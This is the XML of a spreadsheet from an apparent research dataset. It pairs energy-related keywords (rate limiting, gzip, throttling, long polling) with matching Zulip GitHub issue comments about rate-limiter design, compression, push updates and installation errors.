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danarapp/Desktop/energypattern-keyword-search/processing_pipeline/analysis/analyzed_matches/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{6C5F2AB0-75D0-DE45-BFCF-5CC600B1122D}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="760" windowWidth="30240" windowHeight="17180" activeTab="4"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3" i="2" l="1"/>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9" i="4"/>
  <c r="E8" i="4"/>
  <c r="E7" i="4"/>
  <c r="E6" i="4"/>
  <c r="E5" i="4"/>
  <c r="E4" i="4"/>
  <c r="E3" i="4"/>
  <c r="E2" i="4"/>
  <c r="E29" i="3"/>
  <c r="E28" i="3"/>
  <c r="E27" i="3"/>
  <c r="E26" i="3"/>
  <c r="E25" i="3"/>
  <c r="E24" i="3"/>
  <c r="E23" i="3"/>
  <c r="E22" i="3"/>
  <c r="E21" i="3"/>
  <c r="E20" i="3"/>
  <c r="E19" i="3"/>
  <c r="E18" i="3"/>
  <c r="E17" i="3"/>
  <c r="E16" i="3"/>
  <c r="E15" i="3"/>
  <c r="E14" i="3"/>
  <c r="E13" i="3"/>
  <c r="E12" i="3"/>
  <c r="E11" i="3"/>
  <c r="E10" i="3"/>
  <c r="E9" i="3"/>
  <c r="E8" i="3"/>
  <c r="E7" i="3"/>
  <c r="E6" i="3"/>
  <c r="E5" i="3"/>
  <c r="E4" i="3"/>
  <c r="E3" i="3"/>
  <c r="E2" i="3"/>
  <c r="E84"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2617" uniqueCount="921">
  <si>
    <t>row_id</t>
  </si>
  <si>
    <t>matched_word</t>
  </si>
  <si>
    <t>sentence</t>
  </si>
  <si>
    <t>source</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>pattern</t>
  </si>
  <si>
    <t>commit_url</t>
  </si>
  <si>
    <t>comment</t>
  </si>
  <si>
    <t>rate limit</t>
  </si>
  <si>
    <t>Zulip is using now Redis for the rate limit feature and memcached for the django backend. Do you think it worth consolidating both in a Redis cache, and reduce the number of processes? I can work in the pull request if the team thinks they can approve it.</t>
  </si>
  <si>
    <t>issue_comment</t>
  </si>
  <si>
    <t>gzip</t>
  </si>
  <si>
    <t xml:space="preserve"> cleaning out the duplicated configuration files (which I definitely appreciate!), this pull request has a lot of code that duplicates logic we already have the maintain in the codebase. I spent some time trying to understand the code this adds, and here are the notes on the specific things I think we could improve:. - `docker/entrypoint.sh` is 600 lines of code that seems basically like a reimplementation of our `zproject/*settings*.py`; I hope we can reuse the existing code here. For example, if you need to get access to a Django setting from a shell script or other non-Python file, you can do that with `bin/get-django-setting`. . - `docker/Dockerfile` has a large amount of code that seems to overlap with the `install` script; would it work to just use `install` with some options to tweak the behavior instead (e.g. set which puppet rules are included)? - `docker/puppet/zulip/files/nginx/nginx.conf` differs from the version in Zulip in two ways -- one is that it doesn't include the gzip fixes I merged a few weeks ago (just version skew) and the other is that `server_tokens` is turned off -- what is the purpose of that change? - `docker/puppet/zulip/files/createZulipAdmin.sh` could be replaced with a new management command that lives under `zerver/management/commands` that includes its code; I'd be happy to just merge that as a standard feature of Zulip so that this doesn't need to be a docker-specific hack. - I think it should be possible to dramatically shrink the number of puppet manifests that need to be patched (or patched significantly) in order for this to work; e.g. I think some of the packages depended on by `base.pp` could be moved out that manifest. And secondarily I'd be willing to refactor a bit the hierarchy of manifests to make it easier to include a more minimal set of things. . - One thing I wanted to ask you about is why in several of the puppet manifests you've removed `notify =&gt; Service["nginx"],` lines -- is that because you're running `nginx` i</t>
  </si>
  <si>
    <t>socket.io-client</t>
  </si>
  <si>
    <t>I had the same issue and found that it was due to an outdated npm/node:. ```. $ npm -v. 2.12.1. ```. After updating to 3.3.12 and re-running npm install, xmlhttprequest was installed and that fixed the webpack error. ```. $ brew upgrade node. ... $ npm -v. 3.3.12. $ npm install. ├─┬ webpack-dev-server@1.12.1. │ └─┬ socket.io-client@1.3.7. │ └─┬ engine.io-client@1.5.4. │ └── xmlhttprequest@1.5.0 . └── xmlhttprequest@1.5.0 . ```.</t>
  </si>
  <si>
    <t>gzip-compress</t>
  </si>
  <si>
    <t>@dbiollo I opened #392 with versions of the fixes for issues 1, 2, 3, 5, 6, 7, and 8; I'd love it if you could take a quick look at it and test it in your environment! For (4), I think we may need that cache for performance reasons in an actually active realm. It could be valuable to look at whether it makes sense to e.g. gzip-compress the content; I should also note that if we merge #378, we won't have memcached's 1MB limit of object sizes.</t>
  </si>
  <si>
    <t>rate limiting</t>
  </si>
  <si>
    <t>Maybe something like this. How do you feel about authenticating users at the Middleware layer? ``` diff. # A more REST-y authentication decorator, using, in particular, HTTP Basic. # authentication. def authenticated_rest_api_view(view_func):. @csrf_exempt. @wraps(view_func). def _wrapped_view_func(request, *args, **kwargs):. + if request.user.is_authenticated():. + profile = request.user. + else:. - # First try block attempts to get the credentials we need to do authentication. - try:. ... - request.user = profile. - process_client(request, profile). + # First try block attempts to get the credentials we need to do authentication. + try:. ... + request.user = profile. + process_client(request, profile). + . if isinstance(profile, UserProfile):. request._email = profile.email. else:. request._email = "deployment:" + role. profile.rate_limits = "". # Apply rate limiting. ```.</t>
  </si>
  <si>
    <t>I've been meaning to write a more detailed doc on the architecture but here's the short version:. - nginx serves static assets and proxies to django + tornado. - django is the main web application server. - tornado runs the server -&gt; client real-time push system. - postgres is the database and stores basically all the data. - memcached is used for caching of database model objects. - redis is used for a few very short-term data stores; e.g. for rate limiting. - rabbitmq (which is implemented in erlang) is used for queuing expensive work (e.g. sending emails triggered by a message, push notifications, some analytics, etc.) that require reliable delivery but you don't want to do on the main thread. It's also used for communication between the application server and the tornado push system. Feedback on what you'd like to learn more about is very welcome since I'm likely to expand these notes into the architecture docs.</t>
  </si>
  <si>
    <t>Well, our users have been pretty satisfied with what zulipbot is currently capable of doing:. * Managing GitHub issue/pull requests with payloads from GitHub webhooks and their API. * Notifying users about Travis PR build statuses with payloads from Travis webhook. And I've tested out zulipbot periodically sending reports for inactive PRs &amp; issues/needs-review PRs/priority-labeled issues/etc. to streams on Zulip, which works great! But users have also requested that zulipbot respond to users in PMs upon request (such as PRs that need review, or create topics for a PR on #code review stream). These features call for webhooks that deliver payloads when messages are sent, which the API doesn't provide (it provides message history upon request, which means that zulipbot won't be able to immediately respond without constantly checking for messages and easily hitting the API rate limit).</t>
  </si>
  <si>
    <t>Cool, converted the issue description to use checkboxes and checked the `to_non_negative_float` one; can we also check one of the rate limiting ones?</t>
  </si>
  <si>
    <t>socket.io</t>
  </si>
  <si>
    <t>Hi @timabbott . I've made research regarding this issue. 1. We can create proxy for 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t>
  </si>
  <si>
    <t>long polling</t>
  </si>
  <si>
    <t>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investigating. 4. Leave all as is, i.e websockets will work using fallback (long polling).</t>
  </si>
  <si>
    <t>Long polling</t>
  </si>
  <si>
    <t>Hi @timabbott. I have updates regarding issue. I've made proxy tornado server which works in the same mode as twisted proxy with ability to catch websocket connection and handle it through tornado websocket handler. . To look at my progress on this issue I've pushed beta version of script with tornado server as proxy. Sorry It contains copy-paste, debug prints and unnecessary code. I will clean it and add comments when it is ready. Gist: https://gist.github.com/kkanahin/75e28782ee16ff0986e3a9e7946451e6#file-run-dev-tornado-py. Git branch: https://github.com/SmartPeople/zulip/blob/1036-run-dev-tornado/tools/run-dev-tornado.py. The main problems:. - Blocked requests - fixes: was used Async Http Client with callbacks. - Long polling - fixes: was extendув request timeouts. - Chunk response - fixes: was added streaming_callback to request. - Websocket and HttpRequest through one url "/socket.io" . with query params as websocket mark - fixes: was used one Handler for both cases with splitting by Update Header inside.</t>
  </si>
  <si>
    <t>Seems like the `send_api_message` in the loop of `test_hit_ratelimits` is what's making it take so long. Odly when testing with the `time.sleep` patched off it still took 1.178s. ```. ** Test is TOO slow: zerver.tests.test_external.RateLimitTests.test_hit_ratelimits (1.178 s). ```. I noticed this when running and looking. ```. ./tools/test-backend zerver.tests.test_external.RateLimitTests.test_hit_ratelimits. ```. with `test_hit_ratelimits' replaced with. ```. @patch('time.sleep', return_value=None). def test_hit_ratelimits(self, mocker):. # type: () -&gt; None. print('funcstart'). email = "cordelia@zulip.com". user = get_user_profile_by_email(email). clear_user_history(user). print('before loop'). for i in range(6):. result = self.send_api_message(email, "some stuff %s" % (i,)). print('b4 assertEqual'). self.assertEqual(result.status_code, 429). print('after assertEual'). json = ujson.loads(result.content). self.assertEqual(json.get("result"), "error"). self.assertIn("API usage exceeded rate limit, try again in", json.get("msg")). print('after assertIn'). self.assertTrue('Retry-After' in result). self.assertIn(result['Retry-After'], json.get("msg")). # We actually wait a second here, rather than force-clearing our history,. # to make sure the rate-limiting code automatically forgives a user. # after some time has passed. print("time start"). time.sleep(1). print("time end"). result = self.send_api_message(email, "Good message"). self.assert_json_success(result). print('funcend'). ```. while looking at the delays in between</t>
  </si>
  <si>
    <t>retry after</t>
  </si>
  <si>
    <t>ot/zulip/requirements/ipython.txt (line 1)) (from versions: ). No matching distribution found for ipython==5.0.0 (from -r /root/zulip/requirements/ipython.txt (line 1)).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 ```</t>
  </si>
  <si>
    <t>gzipped</t>
  </si>
  <si>
    <t>Cool! We perhaps want to also support adding a setting (http://zulip.readthedocs.io/en/latest/settings.html) for not minifying at all (and test what the perf and gzipped size impacts of that are)...</t>
  </si>
  <si>
    <t>Hmm. We probably want to stick to things supported in nginx in Ubuntu 14.04 Trusty for simplicity of deployment, but there are other compression options than gzip and Brotli. I don't think brotli is a good option without a bunch of manual setup work, since an `nginx` module for it is not distributed with Ubuntu, we'd need to at least use a PPA for it, and it's not clear to me that there is a PPA we count on being maintained with `nginx` security updates for this. I don't think the compression benefits are likely to be worth the logistics of setting it up. . (Edit: we're eventually going to move our oldest supported Linux to Ubuntu 16.04)</t>
  </si>
  <si>
    <t>Pushed updates</t>
  </si>
  <si>
    <t>@TomaszKolek ok, I understand now, thanks for explaining. Pushed updates.</t>
  </si>
  <si>
    <t>Rendering in the frontend with KaTeX is very fast, and the loading time is almost unnoticeable, even with long and complex formulas. [Here](https://gist.github.com/YagoGG/5454f555a0274c196646410ac007d6ac) are some TeX expressions that can be useful for testing. You may need to override the API's rate limit by adding in `zerver/lib/rate_limiter.py`:. ```python. def is_ratelimited(user, domain='all'):. # type: (UserProfile, Text) -&gt; Tuple[bool, float]. + return False, 0.0. ```. ---. And also some food for thought while we work on this: is there a better way to identify the `KatexPattern`, besides a veeery long regex? We would need something like this in order to support all the braces:. ```. (?P&lt;delim&gt;\${1,2})([^$]+)(?P=delim)) | # Include $$&lt;exp&gt;$$ and $&lt;exp&gt;$. (\\\[)([^$]+)(\\\])) | # Also \[&lt;exp&gt;\]. (\\\()([^$]+)(\\\))) # And \(&lt;exp&gt;\) as well. ```. *Newlines, spaces and comments added for better readability. They shouldn't be there, of course.*. Notice that named groups for the expression itself (the `body` group in [Reid's commit](https://github.com/rwbarton/zulip/commit/e5116a36e62f9a69e2260add9beea716a8d53015)) aren't an option anymore, once we have added the brackets.</t>
  </si>
  <si>
    <t>yup, your understanding is great :). . For DoS, there are two different situations:. * We'll probably need installations to register somehow, if they are going to send analytics. We already have tooling to rate limit on some combination of user/realm/endpoint (I forget which), I think in rate_limiter.py, which we could probably extend to this. * A non-installation trying to DoS a Zulip server. This is endpoint independent; they could also just use /login. I should mention, this is a pretty involved project; I think it could be great for GSoC, but probably not something that would be easy to make progress on in just a week or two.</t>
  </si>
  <si>
    <t>periodic refresh</t>
  </si>
  <si>
    <t>@timabbott That is exactly my use case - an employee directory. Live updates are irrelevant, or could be accomplished through a periodic refresh via AJAX every couple of minutes if we so desired.</t>
  </si>
  <si>
    <t>push updates</t>
  </si>
  <si>
    <t>@blaze225 you should learn how to force-push updates to your PRs rather than closing them and making a new one in response to feedback; it's a lot easier for maintainers to follow the reviews if you do it that way. . Check out our [GitHub guide](http://zulip.readthedocs.io/en/latest/git-guide.html) and [commit guidelines](http://zulip.readthedocs.io/en/latest/version-control.html) for more details.</t>
  </si>
  <si>
    <t>throttling</t>
  </si>
  <si>
    <t>@timabbott I am not able to reproduce this. I tried network throttling but link did get uploaded.</t>
  </si>
  <si>
    <t>I have a suspicion that what's going on is this: . https://blog.chromium.org/2017/03/reducing-power-consumption-for.html. Possibly what's happening is that Chrome's throttling means that sometimes the scroll events don't get throttled, but the "move the pointer" events that would normally prevent scroll events from proceeding too far are being throttled, resulting in the pointer walking below the screen. I'll see if I can verify this by reading code. . If this is true, this would only affect Chrome (and maybe Edge if they're doing the same thing). @wangjames what browser do you use?</t>
  </si>
  <si>
    <t>@rht can you open an issue for extending `zerver/lib/rate_limiter.py` to send a similar header? Seems like a good idea we should adopt in our rate limiting system.</t>
  </si>
  <si>
    <t>A quick note: we already provide the data in the error message: `{"msg":"API usage exceeded rate limit, try again in 15.314237833 secs","result":"error"}`, so this should be trivial to implement.</t>
  </si>
  <si>
    <t>#5126 fixes the problem on /sockjs/info urls showing up. Basically the webpack-dev-server was inlining a loading script with an old url. The problem is getting /socket.io to work. On the websocket site /sockjs is hardcoded. This is a problem because tornado already uses /sockjs. To fix this we are going to have to change one of the urls (rewrite it?), rename the tornado url, or webpack-dev-server. I am not sure the right approach.</t>
  </si>
  <si>
    <t>rate limiter</t>
  </si>
  <si>
    <t>@gnprice, thanks for this interesting feedback. I get your concern about making multiple versions. I think the only reason I went down this road was that this would ensure that the changes would not not introduce any bugs in the current implementation of the rate limiter since the core logic would already be covered through tests of user based rate limiter. However, I like the idea of using a class for abstraction as it would make adding new types of rate limitation very easy. Let me see if I can incorporate your idea without changing the tests.</t>
  </si>
  <si>
    <t>rate limitation</t>
  </si>
  <si>
    <t>rate limiters</t>
  </si>
  <si>
    <t>@gnprice, added both IP and email rate limiters.</t>
  </si>
  <si>
    <t>rate limits</t>
  </si>
  <si>
    <t>Thanks @umairwaheed! Those initial commits now look great -- I just rebased and pushed. I have to run for the evening now, but I'll review the rest in detail tomorrow. @timabbott, one question for you on the interface: how do you think we'll want to configure these rate limits? I'm thinking probably separate rules for user, email, and IP; they don't really need to be the same, and there are likely good reasons for the optimum values to be different between them.</t>
  </si>
  <si>
    <t>This is updated with `woff2` support making gzipped versions about 50% smaller than our current versions.</t>
  </si>
  <si>
    <t>Nice, merged, thanks @synicalsyntax! . I think we could probably remove that throttling if we later changed the page layout such that the subscribers list was in a separate panel, which is an idea we've been talking about. But this is great for now.</t>
  </si>
  <si>
    <t>I just reproduced this in the #integrations stream in Chrome on Linux, exactly as you describe: going down a message makes them appear. I think this has been around for a long time, since it appears to affect production servers running 1.6, so we'll want to debug this by carefully reading the code path that's supposed to render those messages. I wonder whether it could be caused by some sort of subtle browser throttling or something, but I think what's most likely is that the `home` key in particular confuses our navigation logic's sense of motion for updating the render window.</t>
  </si>
  <si>
    <t>I have done some testing on this after upgrading to @rht's certbot branch. First of all I got the error:. ```. ./scripts/lib/install: line 44: /scripts/setup/setup-certbot: No such file or directory. Zulip installation failed! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. ```. I resolved that by moving `ZULIP_PATH="$(realpath $(dirname $0)/../..)"` above the following section in `./scripts/lib/install`:. ```. if [ -n "$INSTALL_CERTBOT" ]; then. $ZULIP_PATH/scripts/setup/setup-certbot --hostname $EXTERNAL_HOST --email $ZULIP_ADMINISTRATOR. fi. ```. After running the command again, I now get the following error:. ```. ./scripts/lib/install: line 46: /home/zulip/deployments/2017-10-27-19-52-11/scripts/setup/setup-certbot: Permission denied. Zulip installation failed! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. ```. I managed to fix this by running `chmod a+x /home/zulip/deployments/2017-10-27-19-52-11/scripts/setup/setup-certbot` to give it the same permissions as the other scripts in that folder. Then it ran fine and worked as expected.</t>
  </si>
  <si>
    <t>Sure! I was a little caught up with work, will push updates tonight. Apologies for the delay. On Nov 15, 2017 05:10, "Tim Abbott" &lt;notifications@github.com&gt; wrote:. &gt; @darshanime &lt;https://github.com/darshanime&gt; are you planning to revise. &gt; this based on these suggestions? It'd be greatly appreciated! &gt;. &gt; —. &gt; You are receiving this because you were mentioned. &gt; Reply to this email directly, view it on GitHub. &gt; &lt;https://github.com/zulip/zulip/pull/7232#issuecomment-344437340&gt;, or mute. &gt; the thread. &gt; &lt;https://github.com/notifications/unsubscribe-auth/AGoT7-GX-1R5GIz89bkqf5lxxXH1DZQkks5s2iUDgaJpZM4QMRIB&gt;. &gt; . &gt;.</t>
  </si>
  <si>
    <t>Updated to include proper rate limiting on invitations. (missing coverage, will fix)</t>
  </si>
  <si>
    <t>Hi @ryanle42! In the future, you can force push updates to a PR, instead of closing and re-opening a new one. Feel free to ping folks in #development help if you're not sure how to do that. Thanks for working on this issue!</t>
  </si>
  <si>
    <t>pushed updates</t>
  </si>
  <si>
    <t>Thanks @eeshangarg! I merged Dropbox, and Crashlytics after a minor change. . I also pushed updates to CircleCI and Facebook to https://github.com/rishig/zulip/tree/review-8433. * CircleCI: I think putting in the URL is a bit confusing, so I want to replace it with something like &lt;URL created above&gt;. That causes the formatting bug below; any ideas as to what is going on, or for a workaround? ![image](https://user-images.githubusercontent.com/890911/37057938-d716d80a-213d-11e8-863e-0e7dc19133c9.png). * Facebook: ongoing discussion in chat. .</t>
  </si>
  <si>
    <t>afari, I've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t>
  </si>
  <si>
    <t>deflate</t>
  </si>
  <si>
    <t>'ve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csrftoken=F55wKZN6GOvi2lDXNPdGtfMsHyigUxC4iucK</t>
  </si>
  <si>
    <t>ate for now. 2: Renew &amp; replace the cert (limit ~5 per 7 days). -------------------------------------------------------------------------------. Select the appropriate number [1-2] then [enter] (press 'c' to cancel): 1. Keeping the existing certificate. -------------------------------------------------------------------------------. Certificate not yet due for renewal; no action taken. -------------------------------------------------------------------------------. + CERT_DIR=/etc/letsencrypt/live/zulip.wsm.ovh. + symlink_with_backup /etc/letsencrypt/live/zulip.wsm.ovh/privkey.pem /etc/ssl/private/zulip.key. + '[' -e /etc/ssl/private/zulip.key ']'. + mv -f --backup=numbered /etc/ssl/private/zulip.key /etc/ssl/private/zulip.key.setup-certbot. + ln -nsf /etc/letsencrypt/live/zulip.wsm.ovh/privkey.pem /etc/ssl/private/zulip.key. + symlink_with_backup /etc/letsencrypt/live/zulip.wsm.ovh/fullchain.pem /etc/ssl/certs/zulip.combined-chain.crt. + '[' -e /etc/ssl/certs/zulip.combined-chain.crt ']'. + mv -f --backup=numbered /etc/ssl/certs/zulip.combined-chain.crt /etc/ssl/certs/zulip.combined-chain.crt.setup-certbot. + ln -nsf /etc/letsencrypt/live/zulip.wsm.ovh/fullchain.pem /etc/ssl/certs/zulip.combined-chain.crt. + case "$method" in. + '[' -z 1 ']'. + echo 'Certbot SSL certificate configuration succeeded.'. Certbot SSL certificate configuration succeeded. + '[' yes = yes ']'. + /tmp/tmp.7V0azNiUvf/zulip-server-1.8.1/scripts/lib/create-production-venv /tmp/tmp.7V0azNiUvf/zulip-server-1.8.1. Traceback (most recent call last):. File "/tmp/tmp.7V0azNiUvf/zulip-server-1.8.1/scripts/lib/create-production-venv", line 11, in &lt;module&gt;. from scripts.lib.zulip_tools import run. ModuleNotFoundError: No module named 'scripts.lib'. Zulip installation failed! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. &lt;/pre&gt;</t>
  </si>
  <si>
    <t>, myteam.slack.com → user enters myteam). API token (optional, for Slack workspace admins). File upload (.tar.gz export from Slack). 2. Backend Logic (zerver/views/import.py). View Function:. python. def import_slack(request: HttpRequest) -&gt; HttpResponse:. if request.method == "POST":. subdomain = request.POST.get("subdomain"). token = request.POST.get("token"). tarball = request.FILES.get("tarball"). . # Validate inputs (e.g., file type, subdomain format). if not tarball or not tarball.name.endswith(".tar.gz"):. return json_error("Please upload a Slack export .tar.gz file."). . # Store data (e.g., in S3 or /var/local/slack-imports/). import_id = str(uuid.uuid4()). storage_path = f"slack-imports/{import_id}.tar.gz". default_storage.save(storage_path, tarball). . # Notify admins (async via email). mail_admins(. "New Slack import request",. f"Subdomain: {subdomain}\nToken: {token}\nImport ID: {import_id}",. ). . # Show confirmation page. return render(request, "zerver/import_slack_status.html", {"import_id": import_id}). . return render(request, "zerver/import_slack.html"). 3. Admin Notification. Use Django’s mail_admins() (configured in settings.py with ADMINS list). Email includes:. Subdomain + token (if provided). Import ID (for tracking). Link to admin panel for manual processing. 4. Confirmation Page (import_slack_status.html). Simple message:. html. &lt;h1&gt;Your Slack import is in progress!&lt;/h1&gt;. &lt;p&gt;We’ve notified the administrators. You’ll receive an email when the import is complete.&lt;/p&gt;. &lt;p&gt;Import ID: {{ import_id }}&lt;/p&gt;. 5. Security &amp; Validation. Rate-limiting: Use django-ratelimit to prevent abuse. File validation: Check tarball.content_type (e.g., application/gzip). Token handling: Store tokens encrypted (if saved to DB). 6. Future Improvements (v2+). Automated processing: Use Celery to run ./manage.py import_from_slack in background. Progress tracking: Add ImportStatus model to track progress. User notifications: Webhooks/emails when import finishes. Testing.</t>
  </si>
  <si>
    <t>I hit rate limits when trying to run this branch locally. . My guess is that this block is the problem:. ```. +def fetch_name(username: str) -&gt; str:. + user_url = 'https://api.github.com/users/' + username. + default_name = '@' + username. + r = requests.get(user_url, verify=os.environ.get('CUSTOM_CA_CERTIFICATES')). ```. Can we do a bulk query to the GitHub API here instead?</t>
  </si>
  <si>
    <t>@timabbott For the line-wrapping issue, I think one solution would be to make that section slightly wider than the main content section. I added a new commit that enlarges the list slightly on desktop (screenshots below). As for the rate limiting, I looked into it, and GitHub doesn't seem to have a bulk user-search endpoint. They *do* have ["get all users"](https://developer.github.com/v3/users/#get-all-users), but that just returns *every user* on the platform in chunks of 45 (so I think it would actually be much more inefficient than fetching specific users). Instead, I think that if we're going to fetch names, in order to not get rate-limited we have to authenticate. (It [bumps the rate limit to 5000](https://developer.github.com/v3/#rate-limiting), which is more than enough.) I added to the contributor names commit to look at the environment variables `GITHUB_USERNAME` and `GITHUB_PASSWORD` for authentication, so now I was able to do . ```. GITHUB_USERNAME=skunkmb GITHUB_PASSWORD=&lt;my password&gt; ./tools/update-authors-json. ``` . to successfully get the authors. Please let me know your thoughts. Thanks! *Desktop:*. &lt;img width="1658" alt="desktop" src="https://user-images.githubusercontent.com/17259768/44691298-f74dbb80-aa12-11e8-81c7-d105ca06be16.png"&gt;. *Mobile: (the same as currently)*. &lt;img width="200" alt="mobile" src="https://user-images.githubusercontent.com/17259768/44691306-03397d80-aa13-11e8-9232-aa76358141d6.png"&gt;.</t>
  </si>
  <si>
    <t>@southisle so, the level of activity on your server certainly shouldn't be producing a performance problem (other servers get by without anywhere near that load with less RAM and more users). From the output you've posted, it sounds like you have an I/O performance problem on your database server. Often, this can happen if your virtualization provider is throttling I/O ops on the database server's disk to some level (e.g. 500 ops/second) when users are doing an operation that involves a lot of IO ops (e.g. marking 5000 messages as read via the "bankruptcy" feature takes 500 I/O ops). So my first suggestion would be to investigate if that's happening; the second would be to run the queries that you're seeing as slow under `EXPLAIN ANALYZE SELECT` and post the output; that will tell us where the database is spending its time. .</t>
  </si>
  <si>
    <t xml:space="preserve">@timabbott I would like to take up this issue. I would like to mention I am not an experienced open-source contributor and also new to zulip as well. Came to know about it through GSoC. It was tagged with help wanted but not with tag good first issue so I just want to confirm if it is a good issue for me take up ? &gt; I tried to reproduce this with things like double-clicking, without success. That approach might work if there were sufficiently latency. I also tried to reproduce the issue by simulating network throttling to create a latency and double clicking the delete button multiple times. Browser do sends multiple requests but most of time they returned 400. I got 500 only once. In the below GIF I got 400 error only. ![11219 jan-13-2019 04-38-18](https://user-images.githubusercontent.com/23462580/51079564-398c4680-16ef-11e9-993e-771878272b4b.gif). &gt; One thing that's probably wrong with the JS code here is that we do allow effectively a double-click on the element to send 2 requests to the server. But I think that still wouldn't explain the immediate timing here. &gt; . I propose to solve it by doing the following:. When user clicks delete button at the first time add a loader gif and disable the delete button until we don't get a response or error for the http request sent by first click. &gt; ```. &gt; File "./zerver/lib/retention.py", line 60, in move_messages_to_archive. &gt; ArchivedMessage.objects.bulk_create(arc_messages). &gt; File "/home/zulip/deployments/2019-01-07-19-07-07/zulip-py3-venv/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method. &gt; return getattr(self.get_queryset(), name)(*args, **kwargs). &gt; File "/home/zulip/deployments/2019-01-07-19-07-07/zulip-py3-venv/lib/python3.5/site-packages/django/db/models/query.py", line 440, in bulk_create. &gt; self._batched_insert(objs_with_pk, fields, batch_size). &gt; File "/home/zulip/deployments/2019-01-07-19-07-07/zulip-py3-venv/lib/python3.5/site-packages/django/db/models/query.py", line 1096, </t>
  </si>
  <si>
    <t>servers push</t>
  </si>
  <si>
    <t>Thanks for doing this @gnprice! I posted a few comments; this generally looks great aside from missing test coverage. Ideally we'd merge at least the first commit for the 2.0 release. One thing that this reminds me of is that we may want to follow through on investing in making the individual Zulip servers push notifications code keep track of connected tokens/devices (there's code for this in the branch for encrypting push notifications), and then add to those models the associated app version. That would allow us to make `MAX_UNBATCHED_REMOVE_NOTIFICATIONS` depend on whether the device is known to support the newer format. Definitely wouldn't block on that though.</t>
  </si>
  <si>
    <t>Added a small commit to add test coverage for an uncovered case in the original rate limiter in rate_limit_user. Not exactly very relevant to this PR, but maybe it's mergeable.</t>
  </si>
  <si>
    <t>This is awesome, thanks @mateuszmandera! I posted a batch of comments on changes needed to merge this PR. And since you seem to understand our rate limiting system pretty well now, I think https://github.com/zulip/zulip/issues/5677 would be a super awesome project for you to tackle next. There's an old open PR for it, https://github.com/zulip/zulip/pull/5880, which as you can see was pretty troubled and we were unable to get into a good state (and I would not base your work directly on). But there's a lot of great commentary Greg Price on what the right design for this is.</t>
  </si>
  <si>
    <t>Thanks for working on this! Can you rebase? (and sorry for the delayed review). For your question: I think we want both IP and user-based rate limiting, and I think we can skip doing anything special about the "block login" issue. Users can always email support and we can figure it out from there. .</t>
  </si>
  <si>
    <t>&gt; I sorta wonder if it'd be better to do the rate-limiting in common_get_active_user. The issue I see with that is that it seems that this function, aside of EmailAuthBackend, gets called *after* the authentication part in the whole process. It looks tempting though, since it would rate limit things in a very uniform way, without needing custom code for LDAP backend - but it would need to be done very carefully to make sure there is no leak of the information that authentication succeeded (if the correct password is given during an attempt that is above the rate limit)... Sounds risky.</t>
  </si>
  <si>
    <t>Rate limiting</t>
  </si>
  <si>
    <t>@timabbott I think this should be ready for review, with the mentioned TODOs done. Rate limiting by IP still needs to done, but it should be a simple follow-up and I'd rather wait with it to not have to redo it if we end up wanting to change the approach.</t>
  </si>
  <si>
    <t>I'd expect no performance impact with that scale of users. To give some framing, the `message_sender_processes` piece will mean that you can't send Zulip messages faster than about 20/s without queuing, which is likely impossible in a sustained fashion with that many users just given Zulip's rate limits :).</t>
  </si>
  <si>
    <t>SSRF</t>
  </si>
  <si>
    <t>Agreed. We want to be carful here because we don't want to introduce SSRF or any other nasty issues. Also the system itself could use some rigorous review.</t>
  </si>
  <si>
    <t>I'm a little confused as to why Travis is failing with:. ```. Jul 01 20:52:52 Traceback (most recent call last):. Jul 01 20:52:52 File "/tmp/tmp.QlCssMFUlU/scripts/setup/generate_secrets.py", line 16, in &lt;module&gt;. Jul 01 20:52:52 from django.utils.crypto import get_random_string. Jul 01 20:52:52 ImportError: No module named 'django'. Jul 01 20:52:52 . Jul 01 20:52:52 Zulip installation failed! Jul 01 20:52:52 . Jul 01 20:52:52 The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. The command "mispipe "./tools/ci/$TEST_SUITE" ts" exited with 1. ```</t>
  </si>
  <si>
    <t>Current pull request is good. You can force-push updates or push commits on top. Thanks!</t>
  </si>
  <si>
    <t>@timabbott Yeah, I think I'd like to try this. Also could be good to get this figured before finishing up authentication rate limiting, in case what we do ends up messing with that rate limiting design.</t>
  </si>
  <si>
    <t>Pushed updates. Regarding the filter option: It seems a `filter: {element: ...` is required for `list_render` as attempts to simply remove it were causing problems. (Also put a note in the commit message) To work around that, I just set the input type to `hidden`, this has the benefit of making it easy to 'turn on' filtering if it ever becomes desirable.</t>
  </si>
  <si>
    <t>OK, cool, so there's still a bug here, thanks for the investigation! There's two things that can help debug this:. (1) Look at `/var/log/zulip/server.log` to see what requests were being made that hit the rate limit. (2) Using the browser developer tools "Network" tab, watch what responses are being sent by the server to the "events" endpoint. My guess is you'll learn something like the LDAP sync script is sending an event "changing the name from Full Name to Full Name" for every user -- what we need to know is which field is getting that sort of useless repeat events.</t>
  </si>
  <si>
    <t>@jmandel I don't think throttling is a great workaround here, since it will be painful for folks on small realms who are used to zippy updates in the suggestions. I've started to work on this, and I think we can at least make a big dent in the problem:. https://github.com/zulip/zulip/pull/13561</t>
  </si>
  <si>
